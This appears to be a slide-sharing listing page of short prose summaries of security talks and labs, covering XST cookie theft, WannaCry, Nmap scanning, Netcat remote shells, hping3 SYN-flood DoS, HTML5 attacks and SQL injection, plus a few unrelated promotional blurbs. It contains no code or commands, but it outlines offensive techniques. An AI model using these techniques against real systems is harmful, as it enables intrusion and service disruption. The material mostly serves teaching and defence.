The document discusses a new web security technique called cross-site tracing (XST) that can bypass the HTTP-only security feature in Internet Explorer 6 SP1 and perform cross-site scripting attacks. XST exploits the TRACE HTTP request method, which echoes request information to the client, to obtain authentication cookies from other domains over HTTP and HTTPS. While HTTP-only helps prevent cookie access via JavaScript, XST can still access cookies through TRACE requests.
Ransomware has become a serious epidemic affecting businesses of all sizes, and protecting your company is more essential than ever before as the number of ransomware attacks continues to rise.
Wannacry / WannaCrypt ransomware spreads laterally between computers on the same LAN using the ETERNALBLUE exploit of SMB protocol vulnerabilities in Windows systems. It encrypts files on infected systems with various extensions and demands ransom payments in bitcoin. Users and organizations are advised to apply Windows patches, enable firewalls, practice backups, and follow other best practices to prevent infection and data loss from this ransomware.
The document provides an overview of ethical hacking techniques such as advanced scanning with NMAP to identify open ports and operating systems on remote systems. It discusses how tools like Nmap and Angry IP Scanner can be used to scan locally and remotely, and how information gathered can be used to potentially exploit systems. Example exploits discussed include using Netcat to create remote shells and payloads embedded in files like JPEG and MP3 files. The document emphasizes that while the information is presented, actually hacking systems without permission would be illegal.
This document provides an overview of advanced scanning and exploitation techniques for security testing. It discusses using Nmap to scan for open ports and operating systems. The importance of local IP sweeping to find vulnerable systems on a local network is explained. Netcat is demonstrated as a simple way to create a remote shell on another system. Brief examples of shellcode and exploits that can be delivered through media files like JPGs and MP3s are also provided. The conclusion emphasizes that while this information is shown for educational purposes, actually exploiting systems without permission would be illegal.
The document summarizes various free security tools that can be used to gain experience with system and network security. It describes tools for port scanning (Nessus, Saint, Nmap), firewalls (TCP Wrappers, Portsentry), intrusion detection (Snort, Logcheck), and system administration (Sudo, Lsof, Crack). The document recommends using freeware tools to familiarize yourself with security issues before evaluating commercial vendor tools.
Recently a ransomware variant titled “WannaCry” has infected thousands of unpatched endpoints worldwide.This quick presentation will provide a synopsis of what this threat might mean for end users and what actions can be taken in response to this new information.
The document discusses various cybersecurity threats and exploitation techniques. It introduces vulnerability scanning tools like Nessus and Nikto that can identify security weaknesses. It also discusses methods for exploiting vulnerabilities, including through SQL injection, Perl/CGI issues, and cross-site scripting (XSS) attacks. The document promotes finding and sharing hacking tricks and exploits from security conferences and communities.
Ransomware has become a serious epidemic affecting businesses of all sizes, and protecting your company is more essential than ever before as the number of ransomware attacks continues to rise.
Wannacry / WannaCrypt ransomware spreads laterally between computers on the same LAN using the ETERNALBLUE exploit of SMB protocol vulnerabilities in Windows systems. It encrypts files on infected systems with various extensions and demands ransom payments in bitcoin. Users and organizations are advised to apply Windows patches, enable firewalls, practice backups, and follow other best practices to prevent infection and data loss from this ransomware.
The document provides an overview of ethical hacking techniques such as advanced scanning with NMAP to identify open ports and operating systems on remote systems. It discusses how tools like Nmap and Angry IP Scanner can be used to scan locally and remotely, and how information gathered can be used to potentially exploit systems. Example exploits discussed include using Netcat to create remote shells and payloads embedded in files like JPEG and MP3 files. The document emphasizes that while the information is presented, actually hacking systems without permission would be illegal.
This document provides an overview of advanced scanning and exploitation techniques for security testing. It discusses using Nmap to scan for open ports and operating systems. The importance of local IP sweeping to find vulnerable systems on a local network is explained. Netcat is demonstrated as a simple way to create a remote shell on another system. Brief examples of shellcode and exploits that can be delivered through media files like JPGs and MP3s are also provided. The conclusion emphasizes that while this information is shown for educational purposes, actually exploiting systems without permission would be illegal.
The document summarizes various free security tools that can be used to gain experience with system and network security. It describes tools for port scanning (Nessus, Saint, Nmap), firewalls (TCP Wrappers, Portsentry), intrusion detection (Snort, Logcheck), and system administration (Sudo, Lsof, Crack). The document recommends using freeware tools to familiarize yourself with security issues before evaluating commercial vendor tools.
Recently a ransomware variant titled “WannaCry” has infected thousands of unpatched endpoints worldwide.This quick presentation will provide a synopsis of what this threat might mean for end users and what actions can be taken in response to this new information.
The document discusses various cybersecurity threats and exploitation techniques. It introduces vulnerability scanning tools like Nessus and Nikto that can identify security weaknesses. It also discusses methods for exploiting vulnerabilities, including through SQL injection, Perl/CGI issues, and cross-site scripting (XSS) attacks. The document promotes finding and sharing hacking tricks and exploits from security conferences and communities.
- What is WannaCry?
- What are its Worm, Exploit, Botnet, Backdoor, Ransomware characteristics?
- WannaCry and the end of the world?
- Malware Prevention?
- Is it a big deal? Comparison with other malware
- WannaCry, a Military and Political Perspective
Armitage – The Ultimate Attack Platform for Metasploit Ishan Girdhar
Provides recommendations for exploits and active checks.
Hosts: Shows discovered hosts and lets you manage them.
Consoles: Provides access to Metasploit console and shell access.
Some key areas of the interface:
1. Toolbar: Provides access to common tasks like scanning, exploitation.
2. Assistant Panel: Shows exploit recommendations and active check results.
3. Hosts Panel: Lists discovered hosts and their details.
4. Consoles Panel: Access to Metasploit console and shell access.
5. Status Bar: Shows connection status, database status and more.
So in summary, Armitage takes the raw power of Metasploit and wraps it in an easy to
Days of the Honeynet: Attacks, Tools, IncidentsAnton Chuvakin
This document summarizes attacks on a Linux honeypot connected to the internet over time. It describes common exploits attempted including longstanding vulnerabilities in RPC statd and WU-FTPD. It also outlines payloads left by attackers like rootkits and tools and provides examples of infiltration incidents where attackers used compromised systems for IRC bots, flooding attacks, and expanding attacks to other systems.
The document provides instructions for a lab on Snort and firewall rules. It describes:
1) Setting up the virtual environment and configuring networking on the CyberOps Workstation VM.
2) Explaining the differences between firewall and IDS rules while noting their similarities, such as both having matching and action components.
3) Having students run commands to start a malware server, use Snort to monitor traffic, and download a file from the server to trigger an alert, observing the alert in the Snort log.
Syed Ubaid Ali Jafri - Black Box Penetration testing for AssociatesSyed Ubaid Ali Jafri
Syed Ubaid Ali Jafri Informed Information Security Students how to conduct black box penetration testing if you do not have prior knowledge about the network environment, Few steps and consideration that should be in mind before conducting black box audit
Vulnerability scanning evaluates an organization's systems and network to identify vulnerabilities such as missing patches, unnecessary services, weak authentication, and weak encryption. The document discusses using the Advanced IP Scanner tool to perform a network scan on a target Windows Server 2008 system from a Windows 8 attacker system to check for live systems, open ports, and gather information about computers on the local network. It provides instructions on launching Advanced IP Scanner, entering an IP address range to scan, and viewing the scan results.
42 - Malware - Understand the Threat and How to RespondThomas Roccia
Malware are becoming more and more complex. In this talk presenting with Jean-Pierre Lesueur at the School 42, we explained the business model behind as well provided an understanding of the Malware Threat.
Defeating spyware and forensics on the black berry draftidsecconf
This document discusses techniques for defeating spyware and malware on BlackBerry devices by poisoning the data repositories that malware targets in order to collect and transmit private user information. It proposes attacking the source of information rather than trying to detect and remove malware. Specific techniques discussed include POEPFlood, PWNGoal, DDTS, and FMLog. POEPFlood works by introducing fake data to overwhelm repositories with useless information. PWNGoal uses third parties to generate fake messages. DDTS and FMLog aim to hamper forensic analysis by preventing device access or overwriting logs. The techniques are demonstrated for defeating malware targeting email, SMS, call history, and contacts.
Talk of the hour, the wanna crypt ransomwareshubaira
The document discusses the WannaCrypt ransomware attack that occurred in May 2017. It describes how WannaCrypt exploited a Windows vulnerability to spread, encrypted files on infected systems, and demanded ransom payments in Bitcoin. The document provides details on the malware components, infection cycle, indicators of infection, and recommendations for prevention and cleanup of infected systems. It also includes definitions of relevant cybersecurity terminology.
The document discusses how hackers can gain access to computer systems and the information within. It describes how hackers use tools like port scanners to find vulnerabilities, and how trojan horse viruses can be used to install remote access software onto a target system without the user's knowledge. Basic tips are provided on how to protect against these kinds of attacks, such as turning off file sharing and being wary of unexpected program files received from others.
Snort Intrusion Detection / Prevention System on PFSense FirewallHuda Seyam
This project is devoted to presenting a solution to protect web pages that acquire passwords and user names against HTML brute force.
By performing a brute force password auditing against web servers that are using HTTP authentication with Nmap and detect this attack using snort IDS/IPS on PFSense Firewall.
The WannaCry ransomware outbreak shook the world when it occured in May 2017.
This slidedeck looks at the attack, how it was carried out, and its success rate. It also attempts to figure out who was likely to have been behind this devastating cyber attack.
For more information on this outbreak, take a look at these additional resources:
What you need to know about the WannaCry Ransomware: https://www.symantec.com/connect/blogs/wannacry-3
WannaCry: Ransomware attacks show strong links to Lazarus group: https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group
Can files locked by WannaCry be decrypted: A technical analysis: https://medium.com/threat-intel/wannacry-ransomware-decryption-821c7e3f0a2b
This document provides an introduction to trojans and backdoors, including what they are, how they work, common types of trojans, and methods of detecting trojan activity. Trojans and backdoors allow hackers to send and receive data through open ports to gain control of systems. Common trojan types include remote access trojans, data sending trojans, and trojans that disable security software. Netstat and Wireshark can be used to monitor network activity and detect trojans. Wrappers and defacing applications help disguise trojans by changing file icons or combining with other programs.
This document discusses tools for detecting attacks, including honey pots, anti-spyware tools, and backup/recovery tools. It focuses on KFSensor honeypot software, which acts as a decoy server to detect and study hacker behavior without risk to critical systems. The document also covers NetBus and other Trojans, how anti-spyware software differs from viruses/worms in not self-replicating but exploiting computers for commercial gain, and the importance of backups for recovery from attacks.
Ceh v8 labs module 10 denial of serviceAsep Sopyan
The document describes how to perform a denial-of-service (DoS) attack using hping3. It provides instructions on launching BackTrack 5 r3 in a virtual machine, running hping3 to send a flood of SYN packets to a Windows 7 victim machine, and using Wireshark on the victim to observe the incoming SYN packets. The goal is to overload the victim's resources and render it unavailable by saturating it with external communication requests.
The document provides instructions for performing network enumeration using various tools. It describes enumeration as extracting usernames, machine names, shares, and services from a system. The objectives are to help students enumerate a target network to obtain lists of computers, users, groups, ports, resources, and services. It provides steps to use Nmap and nbtstat to scan IP addresses, identify open ports, determine operating systems, and extract NetBIOS information like computer names and usernames from target machines on the network.
This document provides an overview of ransomware, including what it is, how it spreads, examples of ransomware families, and prevention strategies. Ransomware encrypts files on an infected system and demands payment, usually in cryptocurrency, to decrypt the files. It spreads through spam emails containing malicious attachments or links, compromised websites using exploit kits, and by exploiting vulnerabilities in operating systems. The document demonstrates ransomware infections through snapshots and shares folders. Prevention includes regularly backing up important files, avoiding unsolicited documents, and keeping systems updated.
Ransomware type of malware which restricts access to the computer system that it infects, and demands a ransom paid to the creator(s) of the malware in order for the restriction to be removed. It deliberately locks you out of your computer or your files, and then demands money to let you back in.
Basic information how, why, where etc.
Software Security (Vulnerabilities) And Physical SecurityNicholas Davis
The document discusses various types of software vulnerabilities including:
1. Vulnerabilities can result from weak passwords, software bugs, viruses, or insecure user input.
2. Common causes of vulnerabilities are password management flaws, operating system design flaws, software bugs, and unchecked user input.
3. There is debate around how vulnerabilities should be disclosed, with options including full disclosure, responsible disclosure, and limited disclosure.
The document discusses cross-site tracing (XST), a new web security attack technique that can bypass the HTTP-only security mechanism in Internet Explorer 6 SP1. XST uses the HTTP TRACE request method to echo back request headers, including authentication cookies, allowing an attacker to access credentials from any site. The document provides background on the TRACE method and how it is enabled by default on many web servers. It also explains the HTTP-only cookie option that aims to prevent access to cookies via JavaScript but is circumvented by XST.
This document discusses browser security challenges posed by new technologies like HTML5, cross-document messaging, and browser plugins. It summarizes potential attacks like cross-site scripting through relaxed origin policies, browser SQL injection using HTML5 client storage, and using cross-document messaging to enable cross-site communication. The document advocates for the OWASP Intrinsic Group to work with browser vendors to address these issues.
- What is WannaCry?
- What are its Worm, Exploit, Botnet, Backdoor, Ransomware characteristics?
- WannaCry and the end of the world?
- Malware Prevention?
- Is it a big deal? Comparison with other malware
- WannaCry, a Military and Political Perspective
Armitage – The Ultimate Attack Platform for Metasploit Ishan Girdhar
Provides recommendations for exploits and active checks.
Hosts: Shows discovered hosts and lets you manage them.
Consoles: Provides access to Metasploit console and shell access.
Some key areas of the interface:
1. Toolbar: Provides access to common tasks like scanning, exploitation.
2. Assistant Panel: Shows exploit recommendations and active check results.
3. Hosts Panel: Lists discovered hosts and their details.
4. Consoles Panel: Access to Metasploit console and shell access.
5. Status Bar: Shows connection status, database status and more.
So in summary, Armitage takes the raw power of Metasploit and wraps it in an easy to
Days of the Honeynet: Attacks, Tools, IncidentsAnton Chuvakin
This document summarizes attacks on a Linux honeypot connected to the internet over time. It describes common exploits attempted including longstanding vulnerabilities in RPC statd and WU-FTPD. It also outlines payloads left by attackers like rootkits and tools and provides examples of infiltration incidents where attackers used compromised systems for IRC bots, flooding attacks, and expanding attacks to other systems.
The document provides instructions for a lab on Snort and firewall rules. It describes:
1) Setting up the virtual environment and configuring networking on the CyberOps Workstation VM.
2) Explaining the differences between firewall and IDS rules while noting their similarities, such as both having matching and action components.
3) Having students run commands to start a malware server, use Snort to monitor traffic, and download a file from the server to trigger an alert, observing the alert in the Snort log.
Syed Ubaid Ali Jafri - Black Box Penetration testing for AssociatesSyed Ubaid Ali Jafri
Syed Ubaid Ali Jafri Informed Information Security Students how to conduct black box penetration testing if you do not have prior knowledge about the network environment, Few steps and consideration that should be in mind before conducting black box audit
Vulnerability scanning evaluates an organization's systems and network to identify vulnerabilities such as missing patches, unnecessary services, weak authentication, and weak encryption. The document discusses using the Advanced IP Scanner tool to perform a network scan on a target Windows Server 2008 system from a Windows 8 attacker system to check for live systems, open ports, and gather information about computers on the local network. It provides instructions on launching Advanced IP Scanner, entering an IP address range to scan, and viewing the scan results.
42 - Malware - Understand the Threat and How to RespondThomas Roccia
Malware are becoming more and more complex. In this talk presenting with Jean-Pierre Lesueur at the School 42, we explained the business model behind as well provided an understanding of the Malware Threat.
Defeating spyware and forensics on the black berry draftidsecconf
This document discusses techniques for defeating spyware and malware on BlackBerry devices by poisoning the data repositories that malware targets in order to collect and transmit private user information. It proposes attacking the source of information rather than trying to detect and remove malware. Specific techniques discussed include POEPFlood, PWNGoal, DDTS, and FMLog. POEPFlood works by introducing fake data to overwhelm repositories with useless information. PWNGoal uses third parties to generate fake messages. DDTS and FMLog aim to hamper forensic analysis by preventing device access or overwriting logs. The techniques are demonstrated for defeating malware targeting email, SMS, call history, and contacts.
Talk of the hour, the wanna crypt ransomwareshubaira
The document discusses the WannaCrypt ransomware attack that occurred in May 2017. It describes how WannaCrypt exploited a Windows vulnerability to spread, encrypted files on infected systems, and demanded ransom payments in Bitcoin. The document provides details on the malware components, infection cycle, indicators of infection, and recommendations for prevention and cleanup of infected systems. It also includes definitions of relevant cybersecurity terminology.
The document discusses how hackers can gain access to computer systems and the information within. It describes how hackers use tools like port scanners to find vulnerabilities, and how trojan horse viruses can be used to install remote access software onto a target system without the user's knowledge. Basic tips are provided on how to protect against these kinds of attacks, such as turning off file sharing and being wary of unexpected program files received from others.
Snort Intrusion Detection / Prevention System on PFSense FirewallHuda Seyam
This project is devoted to presenting a solution to protect web pages that acquire passwords and user names against HTML brute force.
By performing a brute force password auditing against web servers that are using HTTP authentication with Nmap and detect this attack using snort IDS/IPS on PFSense Firewall.
The WannaCry ransomware outbreak shook the world when it occured in May 2017.
This slidedeck looks at the attack, how it was carried out, and its success rate. It also attempts to figure out who was likely to have been behind this devastating cyber attack.
For more information on this outbreak, take a look at these additional resources:
What you need to know about the WannaCry Ransomware: https://www.symantec.com/connect/blogs/wannacry-3
WannaCry: Ransomware attacks show strong links to Lazarus group: https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group
Can files locked by WannaCry be decrypted: A technical analysis: https://medium.com/threat-intel/wannacry-ransomware-decryption-821c7e3f0a2b
This document provides an introduction to trojans and backdoors, including what they are, how they work, common types of trojans, and methods of detecting trojan activity. Trojans and backdoors allow hackers to send and receive data through open ports to gain control of systems. Common trojan types include remote access trojans, data sending trojans, and trojans that disable security software. Netstat and Wireshark can be used to monitor network activity and detect trojans. Wrappers and defacing applications help disguise trojans by changing file icons or combining with other programs.
This document discusses tools for detecting attacks, including honey pots, anti-spyware tools, and backup/recovery tools. It focuses on KFSensor honeypot software, which acts as a decoy server to detect and study hacker behavior without risk to critical systems. The document also covers NetBus and other Trojans, how anti-spyware software differs from viruses/worms in not self-replicating but exploiting computers for commercial gain, and the importance of backups for recovery from attacks.
Ceh v8 labs module 10 denial of serviceAsep Sopyan
The document describes how to perform a denial-of-service (DoS) attack using hping3. It provides instructions on launching BackTrack 5 r3 in a virtual machine, running hping3 to send a flood of SYN packets to a Windows 7 victim machine, and using Wireshark on the victim to observe the incoming SYN packets. The goal is to overload the victim's resources and render it unavailable by saturating it with external communication requests.
The document provides instructions for performing network enumeration using various tools. It describes enumeration as extracting usernames, machine names, shares, and services from a system. The objectives are to help students enumerate a target network to obtain lists of computers, users, groups, ports, resources, and services. It provides steps to use Nmap and nbtstat to scan IP addresses, identify open ports, determine operating systems, and extract NetBIOS information like computer names and usernames from target machines on the network.
This document provides an overview of ransomware, including what it is, how it spreads, examples of ransomware families, and prevention strategies. Ransomware encrypts files on an infected system and demands payment, usually in cryptocurrency, to decrypt the files. It spreads through spam emails containing malicious attachments or links, compromised websites using exploit kits, and by exploiting vulnerabilities in operating systems. The document demonstrates ransomware infections through snapshots and shares folders. Prevention includes regularly backing up important files, avoiding unsolicited documents, and keeping systems updated.
Ransomware type of malware which restricts access to the computer system that it infects, and demands a ransom paid to the creator(s) of the malware in order for the restriction to be removed. It deliberately locks you out of your computer or your files, and then demands money to let you back in.
Basic information how, why, where etc.
Software Security (Vulnerabilities) And Physical SecurityNicholas Davis
The document discusses various types of software vulnerabilities including:
1. Vulnerabilities can result from weak passwords, software bugs, viruses, or insecure user input.
2. Common causes of vulnerabilities are password management flaws, operating system design flaws, software bugs, and unchecked user input.
3. There is debate around how vulnerabilities should be disclosed, with options including full disclosure, responsible disclosure, and limited disclosure.
The document discusses cross-site tracing (XST), a new web security attack technique that can bypass the HTTP-only security mechanism in Internet Explorer 6 SP1. XST uses the HTTP TRACE request method to echo back request headers, including authentication cookies, allowing an attacker to access credentials from any site. The document provides background on the TRACE method and how it is enabled by default on many web servers. It also explains the HTTP-only cookie option that aims to prevent access to cookies via JavaScript but is circumvented by XST.
This document discusses browser security challenges posed by new technologies like HTML5, cross-document messaging, and browser plugins. It summarizes potential attacks like cross-site scripting through relaxed origin policies, browser SQL injection using HTML5 client storage, and using cross-document messaging to enable cross-site communication. The document advocates for the OWASP Intrinsic Group to work with browser vendors to address these issues.
Top 10 Web Hacks
Every year the number and creativity of Web hacks increases, and the damage from these attacks rises exponentially, costing organizations millions every year.
Join this webinar to learn about the latest and most insidious Web-based attacks. The much anticipated list, now in its seventh year, represents exhaustive research conducted by a panel of experienced security industry professionals. Learn the latest of the worst in Web hacks, and how to protect your organization.
This document discusses the top 10 web hacking techniques of 2012. It provides an overview of each technique including CRIME, attacking memcached via SSRF, Chrome addon hacking, bruteforcing PHPSESSID, blended threats using JavaScript, cross-site port attacks, permanently backdooring HTML5 client-side applications using local storage, CAPTCHA re-riding attacks, gaining access to HttpOnly cookies in 2012 through Java applets, and attacking OData through HTTP verb tunneling and navigation properties. The document also discusses the history of past web hacking techniques and provides background information on topics like HttpOnly cookies, XST, and CAPTCHAs.
This talk is a generic but comprehensive overview of security mechanism, controls and potential attacks in modern browsers. The talk focuses also on new technologies, such as HTML5 and related APIs to highlight new attack scenario against browsers.
video demos: http://whitehatsec.com/home/assets/videos/Top10WebHacks_Webinar031711.zip
Many notable and new Web hacking techniques were revealed in 2010. During this presentation, Jeremiah Grossman will describe the technical details of the top hacks from 2010, as well as some of the prevalent security issues emerging in 2011. Attendees will be treated to a step-by-step guided tour of the newest threats targeting today's corporate websites and enterprise users.
The top attacks in 2010 include:
• 'Padding Oracle' Crypto Attack
• Evercookie
• Hacking Auto-Complete
• Attacking HTTPS with Cache Injection
• Bypassing CSRF protections with ClickJacking and HTTP Parameter Pollution
• Universal XSS in IE8
• HTTP POST DoS
• JavaSnoop
• CSS History Hack In Firefox Without JavaScript for Intranet Portscanning
• Java Applet DNS Rebinding
Mr. Grossman will then briefly identify real-world examples of each of these vulnerabilities in action, outlining how the issue occurs, and what preventative measures can be taken. With that knowledge, he will strategize what defensive solutions will have the most impact.
This document discusses cross-site scripting (XSS) attacks, how they work, examples of different types of XSS attacks, their impact, and how to prevent them. It also provides examples of how XSS vulnerabilities were detected and exploited in specific eXo products, and references for audiences to learn more about secure coding practices and XSS prevention.
Peter Lubbers from Kaazing gave a presentation on HTML5 WebSocket and communication technologies to the San Francisco Java User Group. He discussed the limitations of traditional HTTP for real-time applications and how technologies like polling and long polling add complexity. He then introduced HTML5 WebSocket as a new standard that enables true full-duplex communication with low latency. Finally, he briefly covered other HTML5 communication features like Server-Sent Events, XMLHttpRequest Level 2, and Cross Document Messaging.
The document discusses various attacks that can be carried out using new features introduced in HTML5, even on websites that do not currently support HTML5. It describes attacks such as cross-site scripting using new HTML5 elements and event attributes, creating reverse web shells using cross-origin resource sharing, bypassing clickjacking defenses using drag and drop APIs and iframe sandboxing, poisoning HTML5 caches, performing client-side remote file inclusion and cross-site posting by controlling AJAX requests, and performing network reconnaissance like port scanning within internal networks using cross-domain XMLHttpRequests and WebSockets. The attacks show that HTML5 introduces new security risks even before its features are widely adopted.
Owasp Top 10 - Owasp Pune Chapter - January 2008abhijitapatil
The document discusses various cybersecurity topics including vulnerabilities, threats, attacks, and countermeasures. It provides an overview of the Open Web Application Security Project (OWASP) which focuses on improving application security. It also summarizes common web vulnerabilities like cross-site scripting (XSS), SQL injection, buffer overflows, and cross-site request forgery (CSRF). Recommendations are given to prevent these vulnerabilities.
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...Jeremiah Grossman
The document discusses techniques for fingerprinting web servers by analyzing differences in their responses to common HTTP requests. It then outlines how this information can be used to identify specific web server software and versions. The document also examines how web server fingerprinting could enable cross-site tracing attacks if certain HTTP request methods like TRACE are enabled.
Dom Hackking & Security - BlackHat PresoShreeraj Shah
The document discusses vulnerabilities in web applications that make extensive use of DOM manipulation. It notes that DOM manipulation through JavaScript calls can allow attackers to exploit cross-site scripting (XSS) vulnerabilities. It also discusses how DOM hacking could enable attacks like cross-domain bypassing, stealing sensitive variables, injecting malicious code, and spreading worms. The author aims to cover vulnerabilities in AJAX applications and techniques for detecting DOM-based XSS through scanning and tools. Mitigation strategies are also discussed.
I'm take picture from here and there by goggling not mentioning all source please let me know if anyone has any objection. This presentation was presented in “securITy” Information Security Conference at BASIS SoftExpo 2012
JS Applications need to exchange data with Backend APIs running on domains other than your own – understanding the same origin policy CSP, CORS and postMessage.
Talk held on Grill.js conference in Wroclaw, Poland on 2018-08-18.
Web 2.0 applications involve increased security risks due to their use of asynchronous JavaScript and XML (AJAX) to dynamically update pages. Key security considerations for Web 2.0 include access control, integrity, availability, and privacy/confidentiality. Developers must validate all user-supplied data to prevent attacks like cross-site scripting, enforce access controls, and use encryption to protect private data transmitted in queries.
The document discusses various HTTP security headers and their purposes. It provides descriptions and examples of HTTP Strict-Transport-Security (HSTS), X-Frame-Options, X-XSS-Protection, X-Content-Type-Options, Content-Security-Policy, and Content-Security-Policy-Report-Only headers. It also discusses limitations and recommendations for using these headers to strengthen security.
The document provides an overview of Java web security coding and open source tools that can be used for testing web application security. It discusses topics like SQL injection, cross-site scripting, web application scanners like Skipfish and WebScarab, and the importance of logging and error handling. Code examples are provided for tasks like logging in Java, using Log4j, and handling SQL injection vulnerabilities. Live sites and vulnerable applications like Hackme Books and HacmeBank are also referenced to demonstrate security issues.
This document provides an overview of a lab on cross-site scripting (XSS) attacks. The lab allows students to exploit an XSS vulnerability in a message board application to perform malicious activities. The document describes 4 tasks for students: 1) posting JavaScript to display an alert, 2) posting JavaScript to display cookies, 3) stealing cookies and sending them to the attacker's machine, and 4) impersonating the victim using stolen cookies. It provides the necessary lab environment including a virtual machine preconfigured with tools for the tasks.
DevSecOps - Integrating Security in the Development Process (with memes) - Ma...Magno Logan
The document discusses shifting security left in the software development lifecycle using an agile approach and automation tools. It recommends planning security from the beginning of the development process. Automation is key to continuously test for vulnerabilities during integration and development. Tools mentioned include an open source CI server to detect errors, Zed Attack Proxy to automatically find web application vulnerabilities, and various resources on securing the DevOps pipeline.
Katana Security - Consultoria em Segurança da InformaçãoMagno Logan
A Katana Security é uma empresa de consultoria em segurança da informação da Paraíba, fundada por Magno Rodrigues. Ela oferece serviços como análises de segurança, auditoria PCI, testes de segurança em aplicações e infraestrutura, revisão de código, e treinamentos em segurança da informação. A empresa também fornece licenças de ferramentas de teste de segurança como Syhunt, Netsparker e Acunetix.
OWASP Top 10 2010 para JavaEE (pt-BR)
Versão traduzida e atualizada do OWASP Top 10 2007 for JavaEE
Traduzida por: Magno Logan (OWASP Paraíba Chapter Leader)
This document provides an overview of the top 10 most critical web application security vulnerabilities for Java EE applications. It discusses each vulnerability in detail, including cross-site scripting (XSS), injection flaws, malicious file execution, insecure direct object references, cross-site request forgery (CSRF), information leakage, broken authentication, insecure cryptographic storage, insecure communications, and failure to restrict URL access. For each issue, it explains how attackers exploit the vulnerability and provides recommendations for protecting against the risk. The goal is to educate developers on common security risks and how to build more secure Java EE applications.
XPath injection occurs when user-supplied input is used to construct an XPath query without sanitization, allowing an attacker to access unauthorized XML data or elevate privileges. Like SQL injection, malicious XPath can expose sensitive information or take control of authentication by modifying the query. The WebCruiser tool can scan for and prove XPath injection vulnerabilities by modifying queries and observing the results.
The document discusses SQL injection, including forms of vulnerability like incorrectly filtered escape characters and incorrect type handling. It describes preventing SQL injection through parameterized statements, escaping user input, and using a web vulnerability scanner. Parameterized statements are the preferred method, binding user input to parameters in the SQL query rather than embedding it. Enforcement can occur at the database or coding level. Escaping user input is an alternative but not as robust as parameterized statements.
This document provides a tutorial on SQL injection, including:
- Explaining what SQL injection is and how it works by exploiting vulnerabilities in database queries
- Steps to test for SQL injection vulnerabilities like determining the database type and getting environment information
- Methods for extracting data through SQL injection like getting database, table, and column names and record data
- Recommending the use of automated SQL injection scanning tools like WebCruiser to more efficiently test for and exploit SQL injection vulnerabilities
- Instructions for setting up sample PHP/MySQL and ASP/SQL Server testing environments to practice SQL injection techniques
1) O documento discute os riscos de segurança mais críticos em aplicações web, conhecidos como OWASP Top 10.
2) A lista dos 10 riscos foi atualizada para 2010 com a adição de dois novos itens e remoção de dois itens anteriores.
3) O objetivo do Top 10 é educar sobre como avaliar e mitigar esses riscos nas aplicações, melhorando assim a segurança.
Tratando as vulnerabilidades do Top 10 do OWASP by Wagner EliasMagno Logan
Este documento apresenta as dez vulnerabilidades mais críticas em aplicações web de acordo com o OWASP Top 10 de 2007, fornecendo uma breve descrição de cada uma delas e dicas de como tratá-las em PHP. O palestrante discute XSS, falhas de injeção, execução maliciosa de arquivos, referência direta a objetos, CSRF, vazamento de informações, furos de autenticação e outras ameaças comuns.
Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka IrongeekMagno Logan
The document discusses various web application vulnerabilities from the OWASP Top 10 list, including cross-site scripting (XSS), SQL injection, remote file inclusion, insecure direct object references, and cross-site request forgery (CSRF). It provides examples of each vulnerability type and recommendations for prevention. It also introduces Mutillidae, a deliberately vulnerable web application that can be used to demonstrate these vulnerabilities in a controlled environment.
Co0L 2011 - Segurança em Sites de Compras Coletivas: Vulnerabilidades, Ataqu...Magno Logan
Co0L 2011 - Segurança em Sites de Compras Coletivas: Vulnerabilidades, Ataques e Contra-medidas
Maio de 2011 em SP
http://garoa.net.br/wiki/O_Outro_Lado
AppSec EU 2009 - HTTP Parameter Pollution by Luca Carettoni and Stefano di P...Magno Logan
This document discusses HTTP Parameter Pollution (HPP), a technique for overriding or adding HTTP parameters by injecting query string delimiters. It can enable server-side attacks by modifying backend requests or bypassing web application firewalls. On the client-side, HPP can inject additional parameters into links and tags to enable attacks like anti-CSRF, UI redressing, or modifying POST requests. Real-world examples show HPP bypassing filters and accessing internal search results. The document categorizes HPP attacks and argues it is an underestimated issue affecting all web technologies.
AppSec EU 2011 - An Introduction to ZAP by Simon BennettsMagno Logan
ZAP (Zed Attack Proxy) is an open source web application penetration testing tool that is easy to use, cross-platform, and has been downloaded over 6,300 times. It includes features like an intercepting proxy, active and passive scanners, a spider, and report generation that allow it to test web applications for vulnerabilities. ZAP has an active international development community, is improving rapidly with new releases, and has the potential to introduce more people to application security best practices.
OWASP Floripa - Web Spiders: Automação para Web Hacking by Antonio Costa aka ...Magno Logan
O documento discute sobre web spiders e fornece exemplos de código em C para criar um web spider simples. Também aborda casos de uso comuns de web spiders, como mineração de dados e autenticação em sites, e menciona ferramentas como Selenium para automação no navegador.
AppSec Brazil 2010 - Utilizando a ESAPI para prover Segurança em Aplicações W...Magno Logan
O documento discute o uso da biblioteca OWASP ESAPI para fornecer segurança em aplicações web. Apresenta os objetivos e roteiro do curso, que inclui uma introdução às vulnerabilidades comuns e à arquitetura da ESAPI, com exemplos em Java. Também aborda conceitos como injeção de código e OWASP Top 10.
AppSec DC 2009 - Learning by breaking by Chuck WillisMagno Logan
Chuck Willis proposes a new OWASP project called the "OWASP Broken Web Applications Project" that would provide a virtual machine containing intentionally vulnerable web applications. The virtual machine would contain various vulnerable versions of applications like WebGoat, WordPress, and phpBB to allow testing of vulnerability scanning, code analysis, and other security tools. Willis is seeking help expanding and maintaining the project.
ENSOL 2011 - OWASP e a Segurança na WebMagno Logan
O documento apresenta uma palestra sobre segurança na web e ferramentas de teste de vulnerabilidades. Resume as principais vulnerabilidades do OWASP Top 10, como injeção de SQL, XSS e falhas de autenticação. Demonstra exemplos e explica como evitar essas falhas. Também apresenta ferramentas open source como OWASP ZAP, Mantra e SQLmap para teste de aplicações.
Your One-Stop Shop for Python Success: Top 10 US Python Development Providersakankshawande
Simplify your search for a reliable Python development partner! This list presents the top 10 trusted US providers offering comprehensive Python development services, ensuring your project's success from conception to completion.
Northern Engraving | Nameplate Manufacturing Process - 2024Northern Engraving
Manufacturing custom quality metal nameplates and badges involves several standard operations. Processes include sheet prep, lithography, screening, coating, punch press and inspection. All decoration is completed in the flat sheet with adhesive and tooling operations following. The possibilities for creating unique durable nameplates are endless. How will you create your brand identity? We can help!
